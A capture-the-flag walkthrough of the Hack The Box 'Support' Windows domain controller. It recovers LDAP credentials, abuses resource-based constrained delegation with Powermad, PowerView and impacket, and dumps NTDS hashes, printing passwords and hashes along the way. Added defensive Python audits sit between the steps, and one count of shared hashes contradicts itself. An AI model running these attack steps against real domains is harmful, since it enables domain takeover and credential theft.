HTB-Support

Box Info

Difficulty Easy
OS Windows
IP Address 10.10.11.174

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.174 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.174 -sCV -Pn -sT -p 53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49664,49667,49678,49676,49701,49739
# Nmap scan vulnerability
sudo nmap -sT -p 53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49664,49667,49678,49676,49701,49739 --script=vuln -O -Pn 10.10.11.174
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.174

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-20 14:18:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

sudo nano /etc/hosts
10.10.11.174 support.htb

Service Enumeration

445/tcp - SMB


The support-tools share contains a few zip files and an executable.


Of these, the UserInfo file looks the most interesting. After extracting it, the first attempt to run the exe failed.


The exe turns out to be a .NET assembly, which can be run under Mono, and Mono is available in Kali:

sudo apt-get install mono-complete -y

After installing mono-complete, UserInfo.exe runs.


While the command runs it reaches out to the LDAP server, as seen in Wireshark. (Thanks to ippsec, this machine is not easy!!!)


Following the LDAP TCP stream shows the credentials the exe uses for its bind:

support\ldap nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Validate the credentials with netexec

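The credentials above were readable in the capture because UserInfo.exe performs an LDAP simple bind, which carries the password in the clear on port 389. The following is an added example, not code from the write-up, showing the detection side of that: a minimal BER decoder for an LDAP BindRequest that a network sensor can use to flag simple binds on the unencrypted port (the same condition a domain controller logs as an insecure bind). The sample packet is constructed inside the block; the DN and password in it are placeholders, not the box's values.

```python
"""Flag LDAP simple binds (cleartext password) on the unencrypted LDAP port.
Added example, not from the original write-up; the sample packet is constructed."""


def _ber_len(n):
    """Encode a BER length (short form below 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, content):
    """One BER tag-length-value element."""
    return bytes([tag]) + _ber_len(len(content)) + content


def encode_simple_bind(msg_id, dn, password):
    """Constructed sample: an LDAPv3 simple BindRequest (RFC 4511) as a client sends it.
    msg_id is kept below 128 so the INTEGER fits in one byte."""
    bind = (_tlv(0x02, bytes([3]))             # version 3
            + _tlv(0x04, dn.encode())          # name (LDAPDN)
            + _tlv(0x80, password.encode()))   # authentication: simple [0]
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x60, bind))  # 0x60 = [APPLICATION 0]


def _read_tlv(buf, pos):
    """Return (tag, content, next_pos) for the TLV that starts at pos."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                          # long-form length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(data):
    """Return (message_id, dn, password) for a simple bind; None for anything else
    (non-bind operations, truncated data, or SASL binds such as GSSAPI/NTLM,
    which do not put a cleartext secret on the wire)."""
    try:
        tag, msg, _ = _read_tlv(data, 0)
        if tag != 0x30:
            return None
        tag_id, mid, pos = _read_tlv(msg, 0)
        tag_op, bind, _ = _read_tlv(msg, pos)
        if tag_id != 0x02 or tag_op != 0x60:
            return None
        _, _version, pos = _read_tlv(bind, 0)
        _, dn, pos = _read_tlv(bind, pos)
        tag_auth, auth, _ = _read_tlv(bind, pos)
    except IndexError:
        return None
    if tag_auth != 0x80:                       # 0xA3 would be a SASL bind
        return None
    return int.from_bytes(mid, "big"), dn.decode(errors="replace"), auth.decode(errors="replace")


def classify_bind(data, dst_port, starttls_active=False):
    """Sensor rule: what kind of bind is this, and is the secret exposed on the wire?"""
    parsed = parse_bind_request(data)
    if parsed is None:
        return "not-a-simple-bind"
    _, dn, password = parsed
    if dn == "" and password == "":
        return "anonymous-bind"
    if password == "":
        return "unauthenticated-bind"          # a DC can be configured to reject these
    if dst_port == 389 and not starttls_active:
        return f"CLEARTEXT-PASSWORD: simple bind as '{dn}' on port {dst_port}"
    return "simple-bind-over-tls"


if __name__ == "__main__":
    sample = encode_simple_bind(1, "support\\ldap", "constructed-password")
    print(classify_bind(sample, 389))
```

Requiring LDAP signing or LDAPS on the domain controller removes the cleartext exposure, but not the root cause here, which is a service-account password embedded in a tool distributed on an open share.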

Initial User Foothold

LDAP

With the captured credentials, explore LDAP using ldapsearch:

# Authenticated search over the whole domain naming context, returning all user attributes
ldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "*"

In the support user's entry there is a note in the info attribute:

info: Ironside47pleasure40Watchful

It looks like it could be a password, and support looks like a shared account. Let's extract the user list:

# Pull the name attribute of every object under CN=Users; the final grep crudely drops
# entries whose name contains D, C, A or U (built-in groups and containers)
ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt


WinRM Support User

evil-winrm -i 10.10.11.174 -u 'support.htb\support' -p Ironside47pleasure40Watchful


User Flag


Privilege Escalation

Bloodhound

bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -ns 10.10.11.174 -d support.htb -c All --zip


The support user, through the Shared Support Accounts group, has GenericAll over the DC computer object.

Initiate Root Foothold

RBCD

Here we abuse Resource-based Constrained Delegation (RBCD) to take over the DC. First, we add a fake computer account to the domain under the support user's control. Then we configure the DC to trust that computer to act on behalf of other identities, so we can request Kerberos tickets to the DC as the fake computer while impersonating other accounts, such as Administrator. Two conditions have to hold for this to work: an authenticated user must be allowed to add machines to the domain, which is governed by the ms-ds-machineaccountquota attribute and needs to be larger than 0; and the support user needs write privileges over a domain-joined computer, which GenericAll on the DC provides.

Support Scripts

Load the scripts that provide New-MachineAccount (Powermad) and Get-DomainComputer/Set-DomainObject (PowerView) into the WinRM session.


Create MachineAccount

New-MachineAccount -MachineAccount cxkhere -Password $(ConvertTo-SecureString 'cxkhere' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = cxkhere$
Verbose: [+] Distinguished Name = CN=cxkhere,CN=Computers,DC=support,DC=htb
[+] Machine account cxkhere added


Obtain the machine account's SID

Get-DomainComputer cxkhere -Properties objectsid

S-1-5-21-1677581083-3380853377-188903654-5602


Modify Machine Security

# Security descriptor whose single ACE names the new machine account's SID as allowed
# to act on behalf of other identities
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5602)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Write the descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on the DC object
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
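The two preconditions named in the RBCD paragraph above (a non-zero ms-DS-MachineAccountQuota and write access to msDS-AllowedToActOnBehalfOfOtherIdentity) are exactly what a defender should audit. Below is an added example, not code from the write-up, that decodes the SDDL string written into that attribute, lists the trustee SIDs it names with their rights, and reports any SID that is not on an allow-list, together with a quota check. The SDDL string is the one from the step above; the allow-list and quota value passed to the audit are constructed.

```python
"""Audit msDS-AllowedToActOnBehalfOfOtherIdentity descriptors and ms-DS-MachineAccountQuota.
Added example, not from the original write-up; allow-list and quota values are constructed."""
import re

# SDDL two-letter access-right tokens that appear in directory ACEs
RIGHT_NAMES = {
    "CC": "CreateChild", "DC": "DeleteChild", "LC": "ListChildren", "SW": "SelfWrite",
    "RP": "ReadProperty", "WP": "WriteProperty", "DT": "DeleteTree", "LO": "ListObject",
    "CR": "ControlAccess", "SD": "Delete", "RC": "ReadControl", "WD": "WriteDacl",
    "WO": "WriteOwner", "GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite",
    "GX": "GenericExecute",
}

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))+)")   # "D:" + optional flags + ACE list
ACE_RE = re.compile(r"\(([^()]*)\)")                 # one parenthesised ACE


def decode_rights(rights):
    """Expand 'CCDCLC...' into names; a hex access mask ('0x...') is kept verbatim."""
    if rights.startswith("0x"):
        return [rights]
    return [RIGHT_NAMES.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]


def parse_sddl_aces(sddl):
    """Return [{'type', 'rights', 'sid'}] for every ACE in the DACL of an SDDL string.
    An empty or missing attribute (no DACL) yields an empty list."""
    m = DACL_RE.search(sddl or "")
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:        # malformed ACE: type;flags;rights;object;inherit;sid
            continue
        ace_type, _flags, rights, _obj_guid, _inh_guid, sid = fields[:6]
        aces.append({"type": ace_type, "rights": decode_rights(rights), "sid": sid})
    return aces


def audit_rbcd(computer, sddl, expected_sids, machine_account_quota):
    """Return a list of findings: a non-zero quota, and every allow ACE whose SID
    is not on the allow-list of accounts permitted to delegate to this computer."""
    findings = []
    if machine_account_quota > 0:
        findings.append(f"ms-DS-MachineAccountQuota={machine_account_quota}: any domain "
                        "user can add computer accounts (set it to 0)")
    for ace in parse_sddl_aces(sddl):
        if ace["type"] == "A" and ace["sid"] not in expected_sids:
            findings.append(f"{computer}: RBCD trustee {ace['sid']} not on allow-list "
                            f"({', '.join(ace['rights'])})")
    return findings


if __name__ == "__main__":
    # SDDL from the step above; quota and (empty) allow-list are constructed audit inputs
    sddl = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5602)"
    for finding in audit_rbcd("dc", sddl, expected_sids=set(), machine_account_quota=10):
        print(finding)
```

In practice the descriptor is read from the directory as bytes and converted to SDDL first (for example with the .NET RawSecurityDescriptor class used in the step above); a write to this attribute on a domain controller object, or on any computer object by a non-administrative account, is also worth alerting on directly.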

Obtain Service Ticket

# Sync the clock first (Kerberos rejects skewed requests), then request a ticket
# for the DC's SPN as the fake computer, impersonating administrator via S4U
sudo ntpdate 10.10.11.174 && impacket-getST support.htb/cxkhere:cxkhere -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb


Wmiexec

# Point the Kerberos tools at the ccache written by getST
export KRB5CCNAME=administrator@www_dc.support.htb@SUPPORT.HTB.ccache

sudo ntpdate 10.10.11.174 && impacket-wmiexec -k -no-pass SUPPORT.HTB/administrator@dc.support.htb


Root Flag


Secretsdump

sudo ntpdate 10.10.11.174 && impacket-secretsdump support.htb/administrator@dc.support.htb -just-dc-ntlm -no-pass -k

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
hernandez.stanley:1107:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
wilson.shelby:1108:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
anderson.damian:1109:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
thomas.raphael:1110:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
levine.leopoldo:1111:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
raven.clifton:1112:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
bardot.mary:1113:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
cromwell.gerard:1114:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
monroe.david:1115:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
west.laura:1116:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
langley.lucy:1117:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
daughtler.mabel:1118:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
stoll.rachelle:1119:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
ford.victoria:1120:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5b392db153a644ffe54dcfeef53c86b8:::
MANAGEMENT$:2601:aad3b435b51404eeaad3b435b51404ee:3f99f2f26988d1f348d378e84f86bc58:::
attackersystem$:5601:aad3b435b51404eeaad3b435b51404ee:ef266c6b963c0bb683941032008ad47f:::
cxkhere$:5602:aad3b435b51404eeaad3b435b51404ee:7a242415354f55e2c546b3bf49241edb:::
[*] Cleaning up...
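Reading the dump above, thirteen user accounts share one NT hash, which means one password was reused across them (typically a provisioning script). The following is an added example, not code from the write-up, of the audit a defender would run over output in this domain\uid:rid:lmhash:nthash format: it parses the lines and reports shared NT hashes, accounts with the empty-password hash, accounts that still store an LM hash, and machine accounts. The sample dump embedded in the block is constructed with placeholder hashes, not the box's values.

```python
"""Audit a secretsdump-style NTDS dump for password reuse and weak entries.
Added example, not from the original write-up; the sample dump is constructed."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# domain\uid:rid:lmhash:nthash:::  (domain prefix optional)
LINE_RE = re.compile(
    r"^(?:[^\\:]+\\)?(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample in the same format as the dump above (placeholder hashes)
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cafebabecafebabecafebabecafebabe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1106:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
bob:1107:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
carol:1108:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:c0ffee00c0ffee00c0ffee00c0ffee00:::
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Return one dict per credential line; status lines ("[*] ...") are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"], "nt": m["nt"]})
    return entries


def audit_hashes(entries):
    """Group accounts by NT hash and flag the hygiene problems a reviewer looks for."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        # same NT hash == same password; expect a disabled Guest here, nothing else
        "shared_nt": {nt: users for nt, users in by_nt.items() if len(users) > 1},
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "machine_accounts": [e["user"] for e in entries if e["user"].endswith("$")],
    }


if __name__ == "__main__":
    report = audit_hashes(parse_secretsdump(SAMPLE_DUMP))
    for nt, users in report["shared_nt"].items():
        print(f"password shared by {len(users)} accounts: {', '.join(users)}")
    print("empty password:", report["empty_password"])
    print("machine accounts:", report["machine_accounts"])
```

The same check on the real dump would list the fifteen accounts that share the hash ending in 350706; an empty-password hash on Guest is expected only while that account is disabled, and any machine account that the asset inventory does not know about (cxkhere$ here) is a sign of the quota abuse described earlier.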
